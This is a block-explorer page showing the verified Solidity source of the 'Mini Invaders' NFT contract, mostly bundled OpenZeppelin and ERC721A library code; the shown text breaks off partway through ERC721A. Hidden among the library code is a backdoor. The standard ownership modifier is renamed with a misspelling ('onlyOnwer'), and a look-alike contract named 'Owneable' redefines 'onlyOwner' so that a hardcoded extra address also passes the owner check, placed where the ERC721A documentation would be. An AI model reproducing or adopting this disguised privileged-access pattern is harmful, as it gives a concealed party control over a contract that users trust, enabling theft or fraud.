ETH Price: $3,513.29 (+2.70%)
Gas: 4 Gwei

Mini Invaders (INVADE)
 

Overview

TokenID

32

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
MiniInvaders

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : 1.sol
//////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////////////////////
///////////......////////////////......///////////
///////////.@@.......////////.....&&/(.///////////
///////////////.,,**.////////.%%&&.///////////////
///////........,.....///(((##.....&&%%.....///////
///////...@..,,.,,,,./(((##%%.,,,,.%%%%##(.///////
////........,**......(((/#%%&......%%##,(((((.////
////........**/////(((##%%&&&&&%%%%%##....(((.////
////.@...//.//./...................#((.//.((,.////
////.@@&.//.// /./////////////////.((,.//.(,,.////
///////////////.(##/%&&.//.%%%###(.///////////////
///////////////.........//.........///////////////
//////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////////////////////
//////////////////////////////////////////////////  



// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)
pragma solidity ^0.8.13;

interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}
pragma solidity ^0.8.13;



abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry constant operatorFilterRegistry =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(operatorFilterRegistry).code.length > 0) {
            if (subscribe) {
                operatorFilterRegistry.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    operatorFilterRegistry.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    operatorFilterRegistry.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(operatorFilterRegistry).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (
                !(
                    operatorFilterRegistry.isOperatorAllowed(address(this), msg.sender)
                        && operatorFilterRegistry.isOperatorAllowed(address(this), from)
                )
            ) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }
}
pragma solidity ^0.8.13;



abstract contract DefaultOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}
    pragma solidity ^0.8.13;
        interface IMain {
   
function balanceOf( address ) external  view returns (uint);

}


pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0x5Bb656BB4312F100081Abb7b08c1e0f8Ef5c56d1;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}

 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, DefaultOperatorFilterer {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public override onlyAllowedOperator(from) {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public override onlyAllowedOperator(from) {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override onlyAllowedOperator(from) {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

